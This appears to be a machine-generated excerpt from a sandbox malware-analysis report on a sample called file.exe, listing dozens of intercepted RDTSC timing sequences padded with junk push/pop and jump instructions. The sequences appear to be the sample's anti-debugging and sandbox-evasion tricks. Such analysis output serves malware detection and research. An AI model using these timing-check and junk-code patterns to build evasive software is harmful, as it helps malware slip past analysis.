                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 688ACF second address: 688ADB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 ja 00007F865D1C5546h 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68891C second address: 688933 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F865CD192E1h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68F7F5 second address: 68F80D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a jmp 00007F865D1C554Eh 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68FC17 second address: 68FC1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68FD6C second address: 68FD72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68FF43 second address: 68FF4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68FF4B second address: 68FF4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6938B3 second address: 6938B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6938B8 second address: 6938BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6938BE second address: 6938C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6938C4 second address: 6938CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6938CC second address: 6938D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6938D2 second address: 6938DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F865D1C5546h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 693426 second address: 69345C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F865CD192E8h 0x00000009 jmp 00007F865CD192E9h 0x0000000e popad 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69345C second address: 693468 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F865D1C5546h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6935EA second address: 6935EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6935EE second address: 693606 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F865D1C5546h 0x00000008 jmp 00007F865D1C554Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 695EEC second address: 695EF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 695EF2 second address: 695EF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A8297 second address: 6A82AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F865CD192DFh 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BA4B9 second address: 6BA4D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865D1C5551h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BA5F3 second address: 6BA5F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BA5F7 second address: 6BA611 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865D1C554Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F865D1C554Ch 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BA611 second address: 6BA62F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865CD192E4h 0x00000007 jnp 00007F865CD192EAh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D4757 second address: 6D475B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D475B second address: 6D4764 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D354D second address: 6D3566 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F865D1C5552h 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D371D second address: 6D3723 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D3E5E second address: 6D3E7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F865D1C5559h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D3E7B second address: 6D3EA1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jg 00007F865CD192D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F865CD192E7h 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D3EA1 second address: 6D3EA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D3EA7 second address: 6D3EAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D3EAD second address: 6D3ED0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 jmp 00007F865D1C554Fh 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F865D1C554Bh 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D3ED0 second address: 6D3ED4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D405E second address: 6D4062 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D4062 second address: 6D406A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D406A second address: 6D4074 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F865D1C5546h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D4344 second address: 6D4364 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F865CD192E1h 0x0000000b popad 0x0000000c js 00007F865CD192E2h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D73FE second address: 6D740F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F865D1C554Dh 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D775A second address: 6D7784 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F865CD192E9h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jo 00007F865CD192D8h 0x00000014 push eax 0x00000015 pop eax 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DA279 second address: 6DA294 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865D1C554Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a jbe 00007F865D1C5576h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DA294 second address: 6DA298 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E10325 second address: 4E10335 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F865D1C554Ch 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E10335 second address: 4E10339 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E10339 second address: 4E10348 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E10348 second address: 4E1034C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E1034C second address: 4E10364 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865D1C5554h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E10364 second address: 4E1039B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F865CD192E1h 0x00000009 or si, 1E86h 0x0000000e jmp 00007F865CD192E1h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov ebp, esp 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E1039B second address: 4E103A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E103A1 second address: 4E103C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865CD192E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F865CD192DDh 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E103C6 second address: 4E103CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E103CC second address: 4E103D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF0E4D second address: 4DF0E67 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865D1C5556h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF0E67 second address: 4DF0E8C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865CD192DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F865CD192E0h 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF0E8C second address: 4DF0E9B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865D1C554Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E30F18 second address: 4E30F35 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865CD192E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E30F35 second address: 4E30F45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F865D1C554Ch 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E30F45 second address: 4E30F68 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865CD192DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F865CD192DBh 0x00000014 push eax 0x00000015 pop edi 0x00000016 popad 0x00000017 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E30F68 second address: 4E30F6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DD00F7 second address: 4DD00FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DD00FB second address: 4DD0112 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865D1C5553h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DD0112 second address: 4DD018D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865CD192E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F865CD192E1h 0x0000000f xchg eax, ebp 0x00000010 jmp 00007F865CD192DEh 0x00000015 mov ebp, esp 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007F865CD192DDh 0x00000020 or esi, 4F248F36h 0x00000026 jmp 00007F865CD192E1h 0x0000002b popfd 0x0000002c call 00007F865CD192E0h 0x00000031 pop ecx 0x00000032 popad 0x00000033 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DD018D second address: 4DD01CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov ecx, 68AF4AB3h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push dword ptr [ebp+04h] 0x00000010 jmp 00007F865D1C5556h 0x00000015 push dword ptr [ebp+0Ch] 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F865D1C5557h 0x0000001f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DD01CF second address: 4DD01D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DD01D5 second address: 4DD01D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF0BF3 second address: 4DF0BF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF0BF9 second address: 4DF0BFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF0BFD second address: 4DF0C79 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F865CD192E6h 0x0000000e push eax 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F865CD192E1h 0x00000016 and cl, FFFFFFB6h 0x00000019 jmp 00007F865CD192E1h 0x0000001e popfd 0x0000001f pushfd 0x00000020 jmp 00007F865CD192E0h 0x00000025 or cx, 5CD8h 0x0000002a jmp 00007F865CD192DBh 0x0000002f popfd 0x00000030 popad 0x00000031 xchg eax, ebp 0x00000032 pushad 0x00000033 mov ebx, esi 0x00000035 mov ecx, 32ECA987h 0x0000003a popad 0x0000003b mov ebp, esp 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF0C79 second address: 4DF0C7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF0C7E second address: 4DF0C84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF0C84 second address: 4DF0C88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF0C88 second address: 4DF0C8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF0C8C second address: 4DF0CA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov ah, 77h 0x0000000e mov edi, 0D9C0280h 0x00000013 popad 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF077F second address: 4DF0786 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, bl 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF0786 second address: 4DF082B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007F865D1C5559h 0x0000000d xchg eax, ebp 0x0000000e jmp 00007F865D1C554Eh 0x00000013 mov ebp, esp 0x00000015 pushad 0x00000016 call 00007F865D1C554Eh 0x0000001b pushfd 0x0000001c jmp 00007F865D1C5552h 0x00000021 sub ax, D728h 0x00000026 jmp 00007F865D1C554Bh 0x0000002b popfd 0x0000002c pop esi 0x0000002d push ebx 0x0000002e pushfd 0x0000002f jmp 00007F865D1C5554h 0x00000034 or eax, 21C90988h 0x0000003a jmp 00007F865D1C554Bh 0x0000003f popfd 0x00000040 pop ecx 0x00000041 popad 0x00000042 pop ebp 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007F865D1C5552h 0x0000004a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF06EA second address: 4DF070E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865CD192E5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b movzx eax, dx 0x0000000e push eax 0x0000000f push edx 0x00000010 mov di, 518Ah 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF041A second address: 4DF0420 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF0420 second address: 4DF0424 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF0424 second address: 4DF0428 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF0428 second address: 4DF046B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 jmp 00007F865CD192DCh 0x0000000e mov dword ptr [esp], ebp 0x00000011 jmp 00007F865CD192E0h 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F865CD192E7h 0x0000001f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF046B second address: 4DF04D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F865D1C554Fh 0x00000009 sbb ax, ECCEh 0x0000000e jmp 00007F865D1C5559h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007F865D1C5550h 0x0000001a add cx, 8548h 0x0000001f jmp 00007F865D1C554Bh 0x00000024 popfd 0x00000025 popad 0x00000026 pop edx 0x00000027 pop eax 0x00000028 pop ebp 0x00000029 pushad 0x0000002a pushad 0x0000002b mov eax, 13778351h 0x00000030 pushad 0x00000031 popad 0x00000032 popad 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF04D1 second address: 4DF04D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E00258 second address: 4E0025E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E0025E second address: 4E00262 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E00262 second address: 4E002ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 jmp 00007F865D1C5556h 0x0000000e mov dword ptr [esp], ebp 0x00000011 pushad 0x00000012 movzx esi, dx 0x00000015 mov ebx, 76828E9Eh 0x0000001a popad 0x0000001b mov ebp, esp 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F865D1C554Bh 0x00000024 sub si, DB4Eh 0x00000029 jmp 00007F865D1C5559h 0x0000002e popfd 0x0000002f push esi 0x00000030 movsx edx, cx 0x00000033 pop ecx 0x00000034 popad 0x00000035 pop ebp 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 pushfd 0x0000003a jmp 00007F865D1C5550h 0x0000003f sub ax, 2AF8h 0x00000044 jmp 00007F865D1C554Bh 0x00000049 popfd 0x0000004a mov cx, 882Fh 0x0000004e popad 0x0000004f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E002ED second address: 4E002F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E002F3 second address: 4E002F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E002F7 second address: 4E002FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E30E79 second address: 4E30E7F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E30E7F second address: 4E30E90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F865CD192DDh 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E10783 second address: 4E1079F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 3EBEh 0x00000007 mov si, bx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F865D1C554Ah 0x00000017 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E1079F second address: 4E107A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E107A3 second address: 4E107A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E107A9 second address: 4E107AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E107AF second address: 4E107B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
